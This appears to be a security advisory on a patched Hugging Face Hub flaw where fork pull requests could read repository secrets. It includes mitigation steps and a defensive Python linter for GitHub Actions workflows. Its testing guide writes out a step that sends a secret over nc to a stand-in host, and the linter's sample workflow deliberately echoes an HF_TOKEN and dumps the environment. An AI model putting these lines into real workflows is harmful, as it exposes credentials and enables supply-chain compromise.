Cross-Tenant Secret Exfiltration in Hugging Face Hub via Insecure CI/CD Action Configuration
Overview
Researchers from Wiz discovered a high-impact vulnerability within the Hugging Face Hub platform that could allow attackers to gain write access to other users' model repositories. The attack exploited a weakness in how the platform's CI/CD system, which is based on GitHub Actions, handled secrets for workflows triggered by pull requests from forked repositories. An attacker could fork a popular model or dataset repository, add a malicious workflow file to their fork, and then open a pull request to the original repository. The malicious workflow was designed to print out all available environment variables and secrets. Due to a misconfiguration, secrets intended only for the original repository, including a powerful `HF_TOKEN` with write permissions, were exposed to the CI runner executing the code from the attacker's pull request. The attacker could then easily exfiltrate this token from the action logs. With the stolen write-access token, the attacker could poison the targeted model by uploading a backdoored version, steal private training data, or deface the model's public page. This vulnerability represented a significant supply chain risk for the entire AI community relying on the Hugging Face Hub for trusted models, as a single compromised popular model could have a widespread downstream impact.
Affected Systems
Testing Guide
This vulnerability was platform-level and has been patched. Testing is no longer possible. However, to test your own repository's resilience to similar issues:
1. Create a new, non-production repository on Hugging Face Hub.
2. Add a repository secret named `MY_SECRET` with a test value.
3. Fork the repository, and in your fork, add a CI workflow file that runs on `pull_request` and includes a step like `run: echo "Secret is ${{ secrets.MY_SECRET }}" | nc attacker.server 1337`.
4. Open a pull request to the original repository and check if the workflow runs and if the secret is exfiltrated.
Mitigation Steps
1. **Rotate Hugging Face Tokens**: All users, especially owners of popular repositories, should rotate their access tokens immediately as a precautionary measure.
2. **Audit Repository Actions**: Review your repository's CI/CD workflows (`.github/workflows/`) to ensure they are not using dangerous patterns that print secrets.
3. **Enable Workflow Approval**: In your repository settings on GitHub (and by extension, Hugging Face Hub), enable the setting to require approval for workflows from first-time contributors.
4. **Use Scoped Tokens**: When creating tokens for automation, grant them the narrowest possible permissions (e.g., read-only) required for the task.
Patch Details
Hugging Face rolled out a platform-wide patch that changes the permissions of the `GITHUB_TOKEN` for pull requests from forks and restricts which secrets are exposed to these workflows.
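The "Audit Repository Actions" mitigation step above and the permission change described in the patch both come down to what a workflow file exposes to pull-request-triggered runs. The following is an added example (not Wiz's, Hugging Face's, or GitHub's code) of a small audit script a repository owner could run over `.github/workflows/*.yml`. It flags the patterns this advisory warns about: `run` steps that interpolate `${{ secrets.* }}`, steps that dump the whole environment (`env`, `printenv`, `set`), checkout of the pull request head under a `pull_request_target` trigger (where base-repository secrets are in scope), and a missing top-level `permissions:` block. The two workflow documents are constructed samples for the demonstration; the check names and the line-based scanning approach are this example's own design (it deliberately avoids a YAML dependency, so a block-scalar `run: |` body is tracked by indentation).

```python
import re
from typing import List, Tuple

Finding = Tuple[str, int, str]  # (check name, 1-based line number, offending line)

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.")
HEAD_REF = re.compile(r"github\.event\.pull_request\.head")
RUN_KEY = re.compile(r"^(\s*-?\s*)run:\s*(.*)$")
ENV_DUMP = re.compile(r"^\s*(env|printenv|set)\s*$")

# Constructed sample: a workflow that leaks secrets to code from a fork.
# Line numbers matter for the findings below (line 1 is "name: ci").
VULNERABLE_WORKFLOW = """\
name: ci
on: [pull_request_target]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: env
      - run: |
          echo "token=${{ secrets.HF_TOKEN }}"
"""

# Constructed sample: same job with a read-only token, no secret use in
# run steps, and no checkout of the untrusted PR head under pull_request_target.
HARDENED_WORKFLOW = """\
name: ci
on: [pull_request]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: python -m pytest
"""


def audit_workflow(text: str) -> List[Finding]:
    """Scan one GitHub Actions workflow file and return the risky lines found."""
    lines = text.splitlines()
    findings: List[Finding] = []

    # A workflow with no top-level permissions block falls back to the
    # repository default for GITHUB_TOKEN, which may be write-all.
    if not any(ln.startswith("permissions:") for ln in lines):
        findings.append(("missing_top_level_permissions", 0, ""))

    # pull_request_target runs with the base repository's secrets; checking out
    # the PR head in that context executes untrusted code with secrets in scope.
    pr_target = any("pull_request_target" in ln for ln in lines)

    in_run, key_col = False, 0
    for n, ln in enumerate(lines, start=1):
        if pr_target and HEAD_REF.search(ln):
            findings.append(("untrusted_checkout_with_secrets", n, ln.strip()))

        if in_run and not ln.strip():
            continue  # blank line inside a block-scalar run body
        m = RUN_KEY.match(ln)
        if m:
            in_run, key_col = True, len(m.group(1))
            cmd = m.group(2)
        elif in_run and (len(ln) - len(ln.lstrip(" ")) > key_col):
            cmd = ln  # continuation line of a "run: |" block scalar
        else:
            in_run = False
            continue

        # Secrets expanded into a shell command end up in process listings and
        # are one echo away from the public action log.
        if SECRET_REF.search(cmd):
            findings.append(("secret_in_run", n, ln.strip()))
        # Dumping the environment prints every injected secret at once.
        if ENV_DUMP.match(cmd):
            findings.append(("env_dump", n, ln.strip()))
    return findings


if __name__ == "__main__":
    for label, doc in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(f"== {label} ==")
        for check, line_no, text in audit_workflow(doc):
            print(f"  {check} (line {line_no}): {text}")
```

Run it over a real checkout with `for f in .github/workflows/*.yml; do python audit.py "$f"; done` after adapting the `__main__` block to read a path; the script reports the constructed vulnerable sample with four findings and the hardened one with none. It is a line-based linter rather than a YAML parser, so it errs toward flagging (a `${{ secrets.X }}` passed through a step's `with:` or `env:` mapping is not flagged, and should still be reviewed by hand when the workflow runs on fork pull requests).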